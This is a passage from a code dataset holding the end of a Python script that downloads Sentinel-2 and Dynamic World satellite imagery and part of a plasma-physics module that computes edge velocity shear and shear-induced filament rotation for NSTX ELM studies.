DATETIME.date(year1, 12, 30)\n time2_0 = DATETIME.date(year2, 1, 1)\n time2_1 = DATETIME.date(year2, 12, 30)\n time3_0 = DATETIME.date(year3, 1, 1)\n time3_1 = DATETIME.date(year3, 12, 30)\n return [(time1_0.isoformat(), time1_1.isoformat()), (time2_0.isoformat(), time2_1.isoformat()),\n (time3_0.isoformat(), time3_1.isoformat())]\n\n\nif __name__ == '__main__':\n # For users in mainland China, they need to use a VPN and configure a proxy here, because google services are not\n # accessible in China\n # os.environ['HTTP_PROXY'] = 'http://127.0.0.1:7890'\n # os.environ['HTTPS_PROXY'] = 'http://127.0.0.1:7890'\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--save_path', type=str, default=r\"D:\\try\", help=\"Save path\")\n parser.add_argument('--num_workers', type=int, default=16, help=\"Number of workers for multiprocessing\")\n parser.add_argument('--sample_points', type=int, default=200,\n help=\"Number of sampling points around the base point \")\n parser.add_argument('--cloud_pct', type=int, default=10)\n parser.add_argument('--debug', default=False)\n args = parser.parse_args()\n\n ee.Authenticate()\n ee.Initialize()\n # A file containing coordinates of more than 2,\n # 000 administrative units in China to provide basic sampling information. If you want to sample in other\n # countries, you can prepare a similar document\n points = read_csv(r\"./county_locations.csv\")\n n = args.sample_points\n # Use Gaussian sampling to keep data concentrated in urban areas as much as possible\n sampler = GaussianSampler(interest_points=points)\n\n\n def worker(idx):\n idx = idx\n try:\n center_coord = sampler.initialize_point()\n except Exception as e: # Sampling overruns\n print(e)\n return\n for loc_id in range(n):\n if args.save_path is not None:\n location_path = os.path.join(args.save_path, f'{idx:06d}')\n os.makedirs(location_path, exist_ok=True)\n sub_location_path = os.path.join(location_path, str(loc_id))\n os.makedirs(sub_location_path, exist_ok=True)\n downloadS2andDynamicWorld(sampler, dates, center_coord, sub_location_path, args.cloud_pct, args.debug)\n return\n\n\n indices = range(len(points))\n\n if args.num_workers == 0:\n for i in indices:\n worker(i)\n else:\n with Pool(processes=args.num_workers) as p:\n p.map(worker, indices)\n","repo_name":"zpl99/STSR-Seg","sub_path":"Download/s2andDynamicWorld_download.py","file_name":"s2andDynamicWorld_download.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"71063929051","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 14 12:39:01 2022\n\n@author: mlampert\n\"\"\"\n\nimport pandas\nimport copy\n\nimport os\nimport flap\nimport flap_nstx\nimport numpy as np\nimport scipy\n\nfrom flap_nstx.gpi import nstx_gpi_velocity_analysis_spatio_temporal_displacement\nfrom flap_nstx.analysis import read_gpi_results, read_thomson_results\nfrom flap_nstx.tools import calculate_corr_acceptance_levels\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.ticker import MaxNLocator\n\nthisdir = os.path.dirname(os.path.realpath(__file__))\nfn = os.path.join(thisdir,\"../flap_nstx.cfg\")\nflap.config.read(file_name=fn)\nflap_nstx.register()\nwd=flap.config.get_all_section('Module NSTX_GPI')['Working directory']\n\ndef calculate_shear_layer_vpol(elm_time_range=200e-6, #Time range the shear layer calculated in (actually [t_elm-t-25us,t_elm-25us])\n elm_time_adjust=25e-6, #Leave this time out from the averaging for the profile estimation\n shear_calc_t_elm_range=[-5e-3,0e-6], #Available as of 03/22/2022: [-200e-6,0] and [-500e-6,200e-6]\n shear_avg_t_elm_range=[-5e-3,-200e-6], #Average time range for the shear layer calculations\n # should be in between shear_calc_t_elm_range+{+fbin*samplingtime,-fbin*sampling_time} \n sg_filter_order=11, #Scholasky-Golay filter order\n fbin=10, #+-binning average for the poloidal velocity calculation\n sampling_time=2.5e-6,\n\n plot_shear_profile=False, #Plot each shear layer profile and v'pol\n shot_to_plot=None, #Plot the rotation profile of the shot or shot list\n \n \n nocalc=True, #Recalculate the velocity results\n verbose=False,\n test=False,\n return_results=True,\n save_data_for_publication=False,\n ):\n \n spatial_resolution=0.00375 #m/pix\n \n database_file='/Users/mlampert/work/NSTX_workspace/db/ELM_findings_mlampert_velocity_good.csv'\n db=pandas.read_csv(database_file, index_col=0)\n elm_index=list(db.index)\n elm=0.\n if save_data_for_publication:\n raise NotImplementedError('Do your job already!!!')\n \n if plot_shear_profile:\n pdf_pages=PdfPages(wd+'/plots/edge_shear_profiles.pdf')\n import matplotlib\n matplotlib.use('agg')\n \n data_dict={'data':[],\n 'error':[],\n 'unit':'',\n 'label':'',\n }\n \n quantity_dict={'v_pol':copy.deepcopy(data_dict),\n 'v_pol_prime':copy.deepcopy(data_dict),\n 'v_pol_prime_prime':copy.deepcopy(data_dict),\n \n 'v_pol_smooth':copy.deepcopy(data_dict),\n 'v_pol_prime_smooth':copy.deepcopy(data_dict),\n 'v_pol_prime_prime_smooth':copy.deepcopy(data_dict),\n }\n \n coordinate_dict={'name':None,\n 'label':None,\n 'values':None,\n 'unit':None,\n 'index':None,\n }\n \n shear_data={'data':copy.deepcopy(quantity_dict),\n 'derived':{},\n 'coord':{},\n 'shot':[],\n 'elm_time':[],\n 'code':'flap_nstx.analysis.calculate_shear_layer_vpol'\n }\n \n shear_data['data']['v_pol']['unit']='m/s'\n shear_data['data']['v_pol']['label']='$v_{pol}$'\n \n shear_data['data']['v_pol_prime']['unit']='rad/s'\n shear_data['data']['v_pol_prime']['label']='$v\\'_{pol}$'\n \n shear_data['data']['v_pol_prime_prime']['unit']='$m^{-1}s^{-1}$'\n shear_data['data']['v_pol_prime_prime']['label']='$v\\'\\'_{pol}$'\n \n \n shear_data['data']['v_pol_smooth']['unit']='m/s'\n shear_data['data']['v_pol_smooth']['label']='$v_{pol,SG}$'\n \n shear_data['data']['v_pol_prime_smooth']['unit']='rad/s'\n shear_data['data']['v_pol_prime_smooth']['label']='$v\\'_{pol,SG}$'\n \n shear_data['data']['v_pol_prime_prime_smooth']['unit']='$m^{-1}s^{-1}$'\n shear_data['data']['v_pol_prime_prime_smooth']['label']='$v\\'\\'_{pol,SG}$'\n \n shear_data['derived']['Separatrix radius']={}\n shear_data['derived']['Separatrix radius']['data']=[]\n shear_data['derived']['Separatrix radius']['unit']='m'\n shear_data['derived']['Separatrix radius']['label']='$R_{sep}$'\n \n shear_data['coord']['r']=copy.deepcopy(coordinate_dict)\n \n shear_data['coord']['r']['name']='Radial'\n shear_data['coord']['r']['label']='R'\n shear_data['coord']['r']['unit']='m'\n shear_data['coord']['r']['index']=1\n \n # shear_data['coord']['psin']=copy.deepcopy(coordinate_dict)\n \n # shear_data['coord']['psin']['name']='Normalized flux'\n # shear_data['coord']['psin']['label']='$\\Psi_{n}$'\n # shear_data['coord']['psin']['unit']=''\n # shear_data['coord']['psin']['index']=1\n \n \n for index_elm in range(len(elm_index)):\n #preprocess velocity results, tackle with np.nan and outliers\n shot=int(db.loc[elm_index[index_elm]]['Shot'])\n #define ELM time for all the cases\n elm_time=db.loc[elm_index[index_elm]]['ELM time']/1e3\n \n flap.delete_data_object('*')\n if verbose: print('Calculating '+str(shot)+ ' at '+str(elm_time*1e3)+'ms')\n elm=elm+1\n time_range=list(elm_time+np.asarray(shear_calc_t_elm_range))\n result=nstx_gpi_velocity_analysis_spatio_temporal_displacement(exp_id=shot, \n time_range=time_range, \n x_search=5,\n y_search=5,\n x_range=[5,49], \n y_range=[35,45], \n plot=False, \n pdf=False, \n nocalc=nocalc,\n return_results=True,\n fbin=fbin,\n )\n \n # if n_timewin is None:\n # n_timewin=int(elm_time_range/sampling_time)-2*fbin-int(elm_time_adjust/sampling_time)\n # shear_calc_t_elm_range+[fbin]\n ind_range=np.where(np.logical_and(result['Time'] > elm_time+shear_avg_t_elm_range[0],\n result['Time'] < elm_time+shear_avg_t_elm_range[1]))\n \n vpol_rad=np.mean(result['Poloidal velocity'][:,:,ind_range[0]],axis=(1,2)) #Weird bug, but [0] fixes it.\n vpol_rad_error=np.sqrt(np.var(result['Poloidal velocity'][:,:,ind_range[0]],axis=(1,2)))\n if test:\n print('vpol_rad_error/vpol_rad',\n vpol_rad_error/vpol_rad)\n \n vpol_prime=np.gradient(vpol_rad)/spatial_resolution\n vpol_prime_error=list((vpol_rad_error[0:-2]+vpol_rad_error[2:])/2)\n vpol_prime_error.insert(0,vpol_rad_error[0])\n vpol_prime_error.append(vpol_rad_error[-1])\n vpol_prime_error=np.asarray(vpol_prime_error)\n vpol_prime_error /= spatial_resolution\n if test:\n print('vpol_prime_error/vpol_prime',\n vpol_prime_error/vpol_prime)\n \n vpol_prime_prime=np.gradient(vpol_prime)/spatial_resolution\n vpol_prime_prime_error=list((vpol_prime_error[0:-2]+vpol_prime_error[2:])/2)\n vpol_prime_prime_error.insert(0,vpol_prime_error[0])\n vpol_prime_prime_error.append(vpol_prime_error[-1])\n vpol_prime_prime_error=np.asarray(vpol_prime_prime_error)\n vpol_prime_prime_error /= spatial_resolution\n if test:\n print('vpol_prime_prime_error/vpol_prime_prime',\n vpol_prime_prime_error/vpol_prime_prime)\n if index_elm == 0:\n shear_data['coord']['r']['values']=result['Image x']*spatial_resolution+1.402 #1.402 is the spatial offset of the innermost pixel of the GPI\n \n vpol_rad_smooth = scipy.signal.savgol_filter(vpol_rad, sg_filter_order, sg_filter_order//2)\n vpol_rad_smooth_error = scipy.signal.savgol_filter(vpol_rad_error, sg_filter_order, sg_filter_order//2)\n \n vpol_prime_smooth = scipy.signal.savgol_filter(vpol_prime, sg_filter_order, sg_filter_order//2)\n vpol_prime_smooth_error = scipy.signal.savgol_filter(vpol_prime_error, sg_filter_order, sg_filter_order//2)\n \n vpol_prime_prime_smooth = scipy.signal.savgol_filter(vpol_prime_prime, sg_filter_order, sg_filter_order//2)\n vpol_prime_prime_smooth_error = scipy.signal.savgol_filter(vpol_prime_prime_error, sg_filter_order, sg_filter_order//2)\n \n shear_data['data']['v_pol']['data'].append(vpol_rad)\n shear_data['data']['v_pol']['error'].append(vpol_rad_error)\n \n shear_data['data']['v_pol_prime']['data'].append(vpol_prime)\n shear_data['data']['v_pol_prime']['error'].append(vpol_prime_error)\n \n shear_data['data']['v_pol_prime_prime']['data'].append(vpol_prime_prime)\n shear_data['data']['v_pol_prime_prime']['error'].append(vpol_prime_prime_error)\n \n shear_data['data']['v_pol_smooth']['data'].append(vpol_rad_smooth)\n shear_data['data']['v_pol_smooth']['error'].append(vpol_rad_smooth_error)\n \n shear_data['data']['v_pol_prime_smooth']['data'].append(vpol_prime_smooth)\n shear_data['data']['v_pol_prime_smooth']['error'].append(vpol_prime_smooth_error)\n \n shear_data['data']['v_pol_prime_prime_smooth']['data'].append(vpol_prime_prime_smooth)\n shear_data['data']['v_pol_prime_prime_smooth']['error'].append(vpol_prime_prime_smooth_error)\n \n shear_data['shot'].append(shot)\n shear_data['elm_time'].append(elm_time)\n try:\n R_sep=flap.get_data('NSTX_MDSPlus',\n name='\\EFIT02::\\RBDRY',\n exp_id=shot,\n object_name='SEP R OBJ').slice_data(slicing={'Time':elm_time}).data\n except:\n R_sep=np.nan\n \n shear_data['derived']['Separatrix radius']['data'].append(np.max(R_sep))\n \n if plot_shear_profile:\n if (shot_to_plot is None or \n shot in np.asarray(shot_to_plot)):\n \n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/np.sqrt(2)/2.54))\n ax.plot(shear_data['coord']['r']['values'],\n vpol_rad_smooth/1e3,\n label='$v_{pol}$')\n ax.set_xlabel('R [m]')\n #ax.set_ylabel('$\\partial v_{pol}/\\partial x$ (1/s)')\n ax.set_ylabel('$v_{pol}$ [km/s]')\n ax.set_title('$v_{pol}$ vs. R for #'+str(shot)+' @ '+str(int(elm_time*1e3))+'ms')\n ax.xaxis.set_major_locator(MaxNLocator(5)) \n ax.yaxis.set_major_locator(MaxNLocator(5))\n \n ax2=ax.twinx()\n ax2.set_ylabel('$\\partial v_{pol}/\\partial x$ [$10^{3}$/s]')\n \n ax2.plot(shear_data['coord']['r']['values'],\n vpol_prime_smooth/1e3,\n color='orange',\n label='$v\\'_{pol}$')\n ax2.set_ylim(-np.max(np.abs(vpol_prime_smooth/1e3)),\n np.max(np.abs(vpol_prime_smooth/1e3)))\n ax2.yaxis.set_major_locator(MaxNLocator(5))\n \n\n plt.axvline(np.max(R_sep),\n color='green')\n \n plt.tight_layout(pad=0.1)\n pdf_pages.savefig()\n \n for key in shear_data['data'].keys():\n shear_data['data'][key]['data']=np.asarray(shear_data['data'][key]['data'])\n shear_data['data'][key]['error']=np.asarray(shear_data['data'][key]['error'])\n \n if plot_shear_profile:\n pdf_pages.close()\n matplotlib.use('qt5agg')\n \n if return_results:\n return shear_data\n\n \ndef analyze_shear_filament_dependence(elm_window=400e-6,\n elm_duration=100e-6,\n recalc=False\n ):\n \n pdf_pages=PdfPages(wd+'/plots/shear_max_vs_maximum_angular_velocity.pdf')\n \n gpi_results=read_gpi_results(elm_window=elm_window,\n elm_duration=elm_duration,\n correlation_threshold=0.7,\n transformation=None, #['log','power','exp','diff',]\n transformation_power=None,\n recalc_gpi=recalc,)\n angular_velocity=gpi_results['data']['Angular velocity ccf FLAP log']['data']\n \n thomson_results=read_thomson_results(thomson_time_window=20e-3,\n flux_range=[0.65,1.1],\n recalc_thomson=recalc)\n \n shear_results=calculate_shear_layer_vpol(nocalc=not recalc,\n n_timewin=60,\n sg_filter_order=21)\n max_vpol_shear=[]\n for elm_ind in range(len(thomson_results['Mate']['elm_time'])):\n # max_position=thomson_results['Mate']['data']['Pressure']['position_r']['value'][elm_ind]\n # #ind_search_max=np.where(shear_results['coord']['r']['values'] > max_position)\n try:\n max_vpol_shear.append(np.min(shear_results['data']['v_pol_prime_smooth']['data'][elm_ind,:]))\n except:\n max_vpol_shear.append(np.nan)\n max_vpol_shear=np.asarray(max_vpol_shear)\n \n max_angular_velocity=[]\n for ind in range(angular_velocity.shape[0]):\n ind_notnan=np.logical_not(np.isnan(angular_velocity[ind,:]))\n max_ang_vel=np.max(angular_velocity[ind,:][ind_notnan])\n max_angular_velocity.append(max_ang_vel)\n \n max_angular_velocity=np.asarray(max_angular_velocity)\n \n ind_not_nan=np.where(np.logical_not(np.logical_or(np.isnan(max_vpol_shear),np.isnan(max_angular_velocity))))\n \n max_angular_velocity=max_angular_velocity[ind_not_nan]\n max_vpol_shear=max_vpol_shear[ind_not_nan]\n \n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/2.54/np.sqrt(2)))\n \n ax.scatter(max_vpol_shear,\n max_angular_velocity/1e3,\n s=2)\n \n ax.set_title('Velocity shear vs. maximum $\\omega$')\n ax.set_xlabel(shear_results['data']['v_pol_prime_smooth']['label']+\" [\"+shear_results['data']['v_pol_prime_smooth']['unit']+\"]\")\n ax.set_ylabel(gpi_results['data']['Angular velocity ccf FLAP log']['label']+'$_{max}$ ['+gpi_results['data']['Angular velocity ccf FLAP log']['unit']+']')\n plt.tight_layout(pad=0.1)\n pdf_pages.savefig()\n pdf_pages.close()\n \n a=max_angular_velocity-max_angular_velocity.mean()\n b=max_vpol_shear-max_vpol_shear.mean()\n print('Correlation between vpol_max and omega_max:', np.sum(a*b)/np.sqrt((np.sum(a**2)*np.sum(b**2))))\n \ndef calculate_shear_induced_angular_velocity(elm_window=400e-6,\n elm_duration=100e-6,\n std_thres_multiplier=1.0,\n std_thres_outlier=3,\n \n filament_lifetime_threshold=5*2.5e-6, #Minimum time the filament needs to be considered to be a valid event\n sampling_time=2.5e-6, #Sampling time DAAA\n time_range_thres=[-50e-6,100e-6], #The filament's movement is analyzed in this time range\n shear_avg_t_elm_range=[-5e-3,-200e-6], #The time range where the shear layer results are averaged\n \n nocalc=True,\n return_results=False,\n \n plot=True,\n plot_error=False,\n plot_for_publication=False,\n plot_model_time_series=False,\n \n pdf=True,\n verbose=False,\n \n test_angular_velocity=False,\n test=False,\n plot_median_shear_layer=False,\n ):\n \"\"\"\n Calculation of the time dependent and independent shear induced filament\n rotation model for the ELM filament rotation study.\n \n Angular acceleration is generally deprecated, because it is a second order\n derivative utilizing a third order derivative which introduces increadibly\n large errors.\n \n Space (time) dependent angular velocity:\n omega(t) = (v_pol'+t*v_pol''*v_rad)/(1+(v_pol'*t)**2)\n \n Space independent angular velocity:\n omega(t) = v_pol'/(1+(v_pol'*t)**2)\n\n Parameters\n ----------\n elm_window : float\n DESCRIPTION. The default is 400e-6.\n elm_duration : float\n DESCRIPTION. The default is 100e-6.\n nocalc : boolean\n DESCRIPTION. The default is True.\n plot : boolean\n DESCRIPTION. The default is True.\n verbose : boolean\n DESCRIPTION. The default is False.\n\n Returns\n -------\n None. Plots the model and experimental angular velocity results.\n\n \"\"\"\n if pdf:\n pdf_pages=PdfPages(wd+'/plots/shear_max_vs_maximum_angular_velocity.pdf')\n if pdf and plot_model_time_series:\n pdf_time_series=PdfPages(wd+'/plots/model_vs_experimental_shear_time_series.pdf')\n \n if pdf and not plot:\n import matplotlib\n matplotlib.use('agg')\n \n gpi_results=read_gpi_results(elm_window=elm_window,\n elm_duration=elm_duration,\n correlation_threshold=0.7,\n transformation=None, #['log','power','exp','diff',]\n transformation_power=None,\n recalc_gpi=not nocalc,\n )\n\n shear_results=calculate_shear_layer_vpol(nocalc=nocalc,\n shear_avg_t_elm_range=shear_avg_t_elm_range,\n sg_filter_order=21,\n test=test)\n \n database_file='/Users/mlampert/work/NSTX_workspace/db/ELM_findings_mlampert_velocity_good.csv'\n db=pandas.read_csv(database_file, index_col=0)\n elm_index=list(db.index)\n \n if test_angular_velocity:\n pdf_pages_ang_vel_test=PdfPages(wd+'/plots/angular_acceleration_fitting_test.pdf')\n \n if pdf and plot:\n pdf_pages=PdfPages(wd+'/plots/shear_induced_rotation_model.pdf')\n \n if pdf and not plot:\n import matplotlib\n matplotlib.use('agg')\n \n coord_dict={'values':None,\n 'label':None,\n 'unit':None,\n 'index':None}\n \n data_dict={'data':[],\n 'error':[],\n 'derived':{},\n 'coord':{},\n 'label':'',\n 'unit':'',\n 'comment':'',\n }\n \n model_angular_velocity={'data':{},\n 'derived':{},\n 'coord':{},\n 'shot':[],\n 'elm_time':[],\n 'code':\"flap_nstx.analysis.calculate_shear_induced_angular_velocity\",\n }\n \n key='Angular velocity time dep model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{model,t}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity time indep model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{model}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time dep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v^{,}_{pol,t,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time indep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time dep max neg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,t,min}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time dep max pos'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,t,max}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time indep max'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,max}$'\n model_angular_velocity['data'][key]['unit']='rad/s' \n \n key='Angular velocity experimental max neg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,min}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental max pos'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,max}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental max neg change t0'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\Delta_{t_{0}} \\omega_{exp,min}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental max pos change t0'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\Delta_{t_{0}} \\omega_{exp,max}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental avg change t0'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\Delta_{t_{0}} \\omega_{exp,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Form factor time dep max'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,t,max}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Form factor time dep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,t,avg}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Form factor time indep max'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,max}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Form factor time indep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,avg}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='First term over second term'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{1}/\\omega_{2}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Average time series exp'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,median}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Average time series model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{mod,median}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Full time series model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{mod,full}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Filament time range'\n model_angular_velocity['derived'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['label']='Time'\n model_angular_velocity['derived'][key]['unit']='s'\n \n key_derived='duration'\n model_angular_velocity['derived'][key]['derived'][key_derived]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['derived'][key_derived]['label']='$\\Delta t$'\n model_angular_velocity['derived'][key]['derived'][key_derived]['unit']='s'\n \n key='Filament radial range'\n model_angular_velocity['derived'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['label']='$\\Delta r t$'\n model_angular_velocity['derived'][key]['unit']='m'\n \n key='Filament total rotation angle'\n model_angular_velocity['derived'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['label']='$\\\\Delta \\\\theta t$'\n model_angular_velocity['derived'][key]['unit']='deg'\n \n key='t'\n model_angular_velocity['coord'][key]=copy.deepcopy(coord_dict)\n model_angular_velocity['coord'][key]['unit']='s'\n model_angular_velocity['coord'][key]['label']='Time'\n model_angular_velocity['coord'][key]['index']=1\n \n exclude_keys_from_nans=['Average time series exp',\n 'Average time series model',\n ]\n \n time_vec=gpi_results['coord']['time']['values']\n \n for index_elm in range(len(elm_index)):\n #preprocess velocity results, tackle with np.nan and outliers\n shot=int(db.loc[elm_index[index_elm]]['Shot'])\n #define ELM time for all the cases\n elm_time=db.loc[elm_index[index_elm]]['ELM time']/1000.\n model_angular_velocity['shot'].append(shot)\n model_angular_velocity['elm_time'].append(elm_time)\n flap.delete_data_object('*')\n if verbose: print('Calculating '+str(shot)+ ' at '+str(elm_time*1e3)+'ms')\n \n \"\"\"\n Filament lifetime calculation\n \"\"\"\n \n \n #Calculate the lifeline of the ELM filament\n #A threshold is calculated from the one standard deviation of the poloidal position\n position_gradient=np.diff(gpi_results['data']['Position max poloidal']['data'][index_elm,:]) \n ind_not_nan=np.logical_not(np.isnan(position_gradient))\n stddev=np.sqrt(np.var(position_gradient[ind_not_nan]))\n threshold=np.mean(np.abs(position_gradient[ind_not_nan]))+std_thres_multiplier*stddev\n ind=np.where(np.abs(position_gradient)>threshold)\n \n #Last index before and first index after the t_elm index in the middle, these two should be indicative of the filament's path\n ind1=np.asarray(ind)[(np.where(np.asarray(ind) < gpi_results['coord']['time']['values'].shape[0]//2))][-1]+1 \n ind2=np.asarray(ind)[(np.where(np.asarray(ind) > gpi_results['coord']['time']['values'].shape[0]//2))][0] \n #Limiting the filament lifetime to a thresholded range\n ind_thres=np.asarray(np.asarray(time_range_thres)/sampling_time+gpi_results['coord']['time']['values'].shape[0]//2,dtype=int)\n \n if ind1 < ind_thres[0]: ind1=ind_thres[0]\n if ind2 > ind_thres[1]: ind2=ind_thres[1]\n #Filament radial path\n filament_path_radial=gpi_results['data']['Position max radial']['data'][index_elm,ind1:ind2+1]\n #Filament lifetime range\n time_range=[gpi_results['coord']['time']['values'][ind1],\n gpi_results['coord']['time']['values'][ind2]]\n time_duration=time_range[1]-time_range[0]\n \n if time_duration > filament_lifetime_threshold:\n\n model_angular_velocity['derived']['Filament time range']['data'].append([time_range])\n model_angular_velocity['derived']['Filament time range']['error'].append(sampling_time)\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['data'].append(time_duration)\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['error'].append(2*sampling_time)\n model_angular_velocity['derived']['Filament radial range']['data'].append(np.asarray([min(filament_path_radial),\n max(filament_path_radial)]))\n \n \"\"\"\n TIME INDEPENDENT CALCULATION: omega(t) = v_pol'/(1+(v_pol'*t)**2)\n \"\"\"\n \n ind_not_nan_v_pol_prime = ~np.isnan(shear_results['data']['v_pol_prime_smooth']['data'][index_elm,:])\n ind_not_nan_v_pol_prime_prime = ~np.isnan(shear_results['data']['v_pol_prime_prime_smooth']['data'][index_elm,:])\n \n v_pol_prime=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind1:ind2+1],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['data'][index_elm,:][ind_not_nan_v_pol_prime])\n v_pol_prime_error=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind1:ind2+1],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['error'][index_elm,:][ind_not_nan_v_pol_prime])\n \n ind_not_nan = ~np.isnan(v_pol_prime)\n v_pol_prime = v_pol_prime[ind_not_nan]\n v_pol_prime_error=v_pol_prime_error[ind_not_nan]\n shear_avg=np.mean(v_pol_prime) #Avg shear rate in the range where the filament's path is\n # try:\n # maxind=np.argmax(np.abs(v_pol_prime)) #Avg shear rate in the range where the filament's path is\n # shear_avg=v_pol_prime[maxind]\n # except:\n # shear_avg=np.nan\n time_duration_error=sampling_time #Conservative estimate, one frame error \n shear_avg_error=np.sqrt(np.var(v_pol_prime))\n \n omega_model = shear_avg/(1+(shear_avg*time_duration)**2)\n omega_model_error=(np.abs((1+(shear_avg*time_duration)**2)+shear_avg*(1+2*shear_avg*time_duration**2)/(1+(shear_avg*time_duration)**2)**2)*shear_avg_error+\n np.abs(shear_avg/(1+(shear_avg*time_duration)**2)**2*2*time_duration*shear_avg**2)*time_duration_error)\n \n model_angular_velocity['data']['Angular velocity time indep model']['data'].append(omega_model)\n model_angular_velocity['data']['Angular velocity time indep model']['error'].append(omega_model_error)\n \n model_angular_velocity['data']['Shearing rate time indep avg']['data'].append(shear_avg)\n model_angular_velocity['data']['Shearing rate time indep avg']['error'].append(shear_avg_error)\n try:\n ind_max=np.argmax(np.abs(v_pol_prime))\n model_angular_velocity['data']['Shearing rate time indep max']['data'].append(v_pol_prime[ind_max])\n model_angular_velocity['data']['Shearing rate time indep max']['error'].append(v_pol_prime_error[ind_max])\n except:\n model_angular_velocity['data']['Shearing rate time indep max']['data'].append(np.nan)\n model_angular_velocity['data']['Shearing rate time indep max']['error'].append(np.nan)\n \n \n \"\"\"\n TIME (SPACE) DEPENDENT CALCULATION: \n Small angles: omega(t) = (v_pol'+t*v_pol''*v_rad)\n \n Large angles: omega(t) = (v_pol'+t*v_pol''*v_rad)/(1+(v_pol'*t)**2)\n \"\"\"\n \n nwin_path=len(filament_path_radial)\n omega_model=np.zeros(nwin_path)\n omega_model_error=np.zeros(nwin_path)\n \n shear_tdep_model=np.zeros(nwin_path)\n shear_tdep_model_error=np.zeros(nwin_path)\n \n shear_tdep_model_1st_term=np.zeros(nwin_path)\n shear_tdep_model_2nd_term=np.zeros(nwin_path)\n \n \n for ind_time in range(ind1,ind2+1):\n time_prop = (ind_time-ind1) * sampling_time\n time_prop_error=2.1e-6/2 # Should be asymmetric, corresponds to +- half the exposition rate\n \n v_rad=gpi_results['data']['Velocity ccf FLAP radial']['data'][index_elm,ind_time]\n v_rad_error=0.00375/2.5e-6 #Pixel size / sampling time\n \n #v_rad=np.gradient(gpi_results['data']['Position max radial']['data'][index_elm,:])[ind_time]/sampling_time\n 